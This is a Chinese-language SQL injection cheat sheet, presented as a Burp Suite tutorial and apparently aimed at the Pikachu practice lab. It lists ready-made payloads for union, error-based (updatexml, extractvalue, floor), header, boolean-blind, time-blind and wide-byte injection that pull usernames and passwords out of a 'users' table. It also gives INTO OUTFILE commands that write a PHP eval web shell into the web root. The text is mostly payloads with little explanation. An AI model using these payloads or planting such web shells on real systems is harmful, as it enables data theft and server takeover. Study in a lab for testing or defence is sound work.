burpsuite实战教程

burpsuite实战教程.pdf

sql注入

  1. 数字型注入
  3. 1 or 1=1
  6. 字符型注入
  8. kobe' or 1=1#
  10. 搜索型注入
  12. kobe%' or 1 =1 #
  14. XX型注入
  16. kobe') or 1=1#
  18. union联合查询 注入
  20. // 1. cols count
  21. kobe' union select 1,2#
  22. // 2. database info
  23. kobe' union select user(),database()#
  24. // 3. tables name
  25. kobe' union select TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk'#
  26. // 4. cols name
  27. kobe' union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users'#
  28. // 5. table content
  29. kobe' union select username,password from pk.users#
  30. // 6. Burte Force
  31. MD5  , SHA1, SHA256, SHA512
  35. 基于函数报错的注入
  37. select查询时只能有一列
  38. ERROR 1241 (21000): Operand should contain 1 column(s)
  40. select查询时结果时多行会报错,需要使用limit限制
  41. ERROR 1242 (21000): Subquery returns more than 1 row
  43. // 1. 测试注入点
  45. kobe' and updatexml(1,version(),0)#
  46. kobe' and updatexml(1,concat(0x7e,version()),0)#
  49. // 2. database info
  50. kobe' and updatexml(1,concat(0x7e,database()),0)#
  52. // 3. tables name
  53. kobe' and updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk')),0)#
  55. kobe' and updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 0,1)),0)#
  57. kobe' and updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 1,1)),0)#
  59. //found users
  60. kobe' and updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 3,1)),0)#
  62. // 4. cols name
  63. kobe' and updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 0,1)),0)#
  65. // found password
  66. kobe' and updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 4,1)),0)#
  67. // found username
  68. kobe' and updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 9,1)),0)#
  70. // 5. table content
  71. kobe' and updatexml(1,concat(0x7e,(select username from pk.users limit 0,1)),0)#
  73. kobe' and updatexml(1,concat(0x7e,(select password from pk.users limit 0,1)),0)#
  75. // 6. Burte Force
  79. extractvalue
  82. kobe' and extractvalue(1,version())#
  83. kobe' and extractvalue(1,concat(0x7e,version()))#
  86. // 2. database info
  87. kobe' and extractvalue(1,concat(0x7e,database()))#
  89. // 3. tables name
  90. kobe' and extractvalue(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk')))#
  92. kobe' and extractvalue(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 0,1)))#
  94. kobe' and extractvalue(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 1,1)))#
  96. //found users
  97. kobe' and extractvalue(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 3,1)))#
  99. // 4. cols name
  100. kobe' and extractvalue(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 0,1)))#
  102. // found password
  103. kobe' and extractvalue(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 4,1)))#
  104. // found username
  105. kobe' and extractvalue(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 9,1)))#
  107. // 5. table content
  108. kobe' and extractvalue(1,concat(0x7e,(select username from pk.users limit 0,1)))#
  110. kobe' and extractvalue(1,concat(0x7e,(select password from pk.users limit 0,1)))#
  112. // 6. Burte Force
  116. floor()
  118. kobe' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x) a )#
  120. kobe' and (select 2 from (select count(*),concat(database(),floor(rand(0)*2))x from  information_schema.tables group by x) a )#
  124. // 2. database info
  125. kobe' and (select 2 from (select count(*),concat(database(),floor(rand(0)*2))x from  information_schema.tables group by x) a )#
  127. // 3. tables name
  129. //found users
  130. kobe' and (select 2 from (select count(*),concat((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 3,1),floor(rand(0)*2))x from  information_schema.tables group by x) a )#
  132. // 4. cols name
  134. // found password
  135. kobe' and (select 2 from (select count(*),concat((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 4,1),floor(rand(0)*2))x from  information_schema.tables group by x) a )#
  136. // found username
  137. kobe' and (select 2 from (select count(*),concat((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 9,1),floor(rand(0)*2))x from  information_schema.tables group by x) a )#
  140. // 5. table content
  141. kobe' and (select 2 from (select count(*),concat((select username from pk.users limit 0,1),floor(rand(0)*2))x from  information_schema.tables group by x) a )#
  143. kobe' and (select 2 from (select count(*),concat((select password from pk.users limit 0,1),floor(rand(0)*2))x from  information_schema.tables group by x) a )#
  146. // 6. Burte Force
  148. 基于函数报错,insert
  150. 1. 测试闭合
  152. insert into member(username,pw,sex,phonenum,email,address) values('hello' -- ',md5('123'),'','','','')
  154. hello' --
  156. insert into member(username,pw,sex,phonenum,email,address) values('hello' or ' ',md5('123'),'','','','')
  158. hello' or '
  160. 2. 获取数据库名称
  162. insert into member(username,pw,sex,phonenum,email,address) values('hello' or updatexml(1,concat(0x7e,database()),0) or '',md5('123123'),'','','','')
  164. hello' or updatexml(1,concat(0x7e,database()),0) or '
  167. // 3. tables name
  169. //found users
  170. kobe' and updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 3,1)),0)#
  172. insert into member(username,pw,sex,phonenum,email,address) values('hello' or updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 3,1)),0) or '',md5('123123'),'','','','')
  174. hello' or updatexml(1,concat(0x7e,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 3,1)),0) or '
  176. // 4. cols name
  177. kobe' and updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 0,1)),0)#
  180. hello' or updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 0,1)),0) or '
  184. // found password
  185. hello' or updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 4,1)),0) or '
  186. // found username
  187. hello' or updatexml(1,concat(0x7e,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 9,1)),0) or '
  190. // 5. table content
  191. kobe' and updatexml(1,concat(0x7e,(select username from pk.users limit 0,1)),0)#
  193. hello' or updatexml(1,concat(0x7e,(select username from pk.users limit 0,1)),0) or '
  194. hello' or updatexml(1,concat(0x7e,(select password from pk.users limit 0,1)),0) or '
  198. 基于函数报错update
  200. // 1. 测试注入
  202. update member set sex=''',phonenum='123',address='1123123',email='123123' where username='test1'" 
  204. ' 报错
  206. update member set sex='' or '',phonenum='123',address='1123123',email='123123' where username='test1'" 
  208. ' or ' bu报错
  210. update member set sex='' or updatexml(1,concat(0x7e,database()),0) or '',phonenum='123',address='1123123',email='123123' where username='test1'" 
  212. // 2. 获取数据库名
  214. ' or updatexml(1,concat(0x7e,database()),0) or '
  216. // 3. tables name
  218. // 4. cols name
  220. // 5. table content
  223. 基于函数报错注入,delete
  225. 1. 测试注入
  226. '  报错
  227. or 1=1 不报错
  229. 2. 获取数据信息
  231. 69+or+updatexml(1,concat(0x7e,database()),0)
  233. // 3. tables name
  235. // 4. cols name
  237. // 5. table content
  239. 69 or updatexml(1,concat(0x7e,(select username from pk.users limit 0,1)),0) 
  241. 69 or updatexml(1,concat(0x7e,(select password from pk.users limit 0,1)),0) 
  244. http头注入
  247. User-Agent: ' or updatexml(1,concat(0x7e,(select password from pk.users limit 0,1)),0) or '
  248. Accept: ' or updatexml(1,concat(0x7e,(select password from pk.users limit 0,1)),0) or '
  250. Cookie: ant[uname]=admin' or updatexml(1,concat(0x7e,(select password from pk.users limit 0,1)),0)#;
  253. 基于布尔的盲注
  255. kobe ' and 1=1#
  257. 获取字符函数
  258. select substr("pk",1,1)='p'; 如果返回为1,说明正确,否则说明错误
  260. 获取数据库名的第一个字符
  261. select substr(database(),1,1)='a'; 如果返回为1,说明正确,否则说明错误
  263. 将字符转为ascii
  264. select ascii(substr(database(),1,1))=112;
  266. 获取字符串的长度
  267. select length(database())=2;
  269. kobe ' and select substr("pk",1,1)='p'#
  271. kobe ' and select ascii(substr(database(),1,1))=112;
  274. 通过查询,and连接,两个查询都为真即为真
  275. select username from member where username ='kobe' and (select ascii(substr(database(),1,1))=112);
  277. kobe' and (select ascii(substr(database(),1,1))=112)#
  279. 后表查询中为假,所以为假
  280. select username from member where username ='kobe' and (select ascii(substr(database(),1,1))=111);
  282. kobe' and (select ascii(substr(database(),1,1))=111)#
  284. // 1. 获取数据库名
  285. // 1. 1获取数据库名的长度
  286. kobe' and (select length(database())=2)#
  288. // 1.2 获取数据库名的每一个字符
  289. kobe' and (select ascii(substr(database(),1,1))=112)#
  291. // 2. 表名
  292. kobe' and (select ascii(substr(database(),1,1))=112)#
  294. // 查询表名,获取第一个表名
  295. select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 0,1
  296. select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 1,1
  298. // 通过获取一个表名,然后判断这个表名的第一个字符的ascii是不是某一个值
  299. kobe' and (select ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 0,1),1,1))=112)#
  301. // 3. 列名
  302. // 判断一列的一个字符
  303. kobe' and (select ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' limit 9,1),1,1))=112)#
  305. // 4.内容
  306. kobe' and (select ascii(substr((select username from pk.users limit 0,1),1,1))=112)#
  310. 基于时间的盲注
  312. 1. 测试注入点
  313. kobe' and sleep(5)#
  316. 2. 获取数据库名
  317. kobe' and if((substr(database(),1,1)='p'),sleep(5),null)#
  319. 3. 表名
  320. kobe' and if((substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='pk' limit 1,1),1,1)='m'),sleep(5),null)#
  322. 4. 列名
  323. // 判断名字的第一个字符
  324. kobe' and if((substr(获取的列名,1,1)='p'),sleep(5),null)#
  326. 5. 表的内容
  327. // 判断名字的第一个字符
  328. kobe' and if((substr(获取的表内容,1,1)='p'),sleep(5),null)#
  332. C:/phpStudy/PHPTutorial/WWW/pk/1.php
  336. 获取操作系统权限:
  338. kobe' union select "<?php @eval($_GET['test'])?>",2 into outfile "C:/phpStudy/PHPTutorial/WWW/pk/2.php"#
  340. kobe' union select "<?php @eval($_POST['test'])?>",2 into outfile "C:/phpStudy/PHPTutorial/WWW/pk/2.php"#
  342. kobe' union select "<?php @eval($_GET['cmd'])?>",2 into outfile "C:/phpStudy/PHPTutorial/WWW/pk/1.php"#
  345. show global variables like '%secure%';
  346. 在mysql的配置文件中
  347. [mysqld] 下面加入
  348. secure_file_priv=
  351. 暴力破解表名和列名称
  353. // 破解表名
  354. kobe' and exists(select * from aa)#
  355. 将aa进行变量化 暴力破解
  357. // 破解列名
  358. kobe' and exists(select id from users)#
  361. 宽字节注入:
  362. 空格 %20
  363. '       %27
  364. #      %23
  365. \      %5c
  367. 1%df' or 1=1#